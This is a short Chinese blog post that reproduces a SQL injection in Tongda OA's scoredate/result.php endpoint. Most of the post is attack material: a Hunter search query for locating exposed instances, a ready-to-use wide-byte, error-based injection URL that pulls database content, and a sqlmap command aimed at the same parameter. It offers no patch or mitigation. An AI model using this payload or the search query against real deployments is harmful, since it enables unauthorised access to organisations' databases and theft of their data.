Babing
Published on 2024-08-30 / 2 Visits
0
0

T10-5通达-OA-SQL

T10-5通达-OA-SQL

漏洞描述:

通达OA /general/score/flow/scoredate/result.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。

网站图片:

image-20240625142236012

网络测绘:

Hunter 语法:

app.name=“通达 OA”

漏洞复现:

payload:

http://192.168.31.164/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23

效果图:
image.png

sqlmap

sqlmap -u "192.168.31.164/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20" --batch

image.png


Comment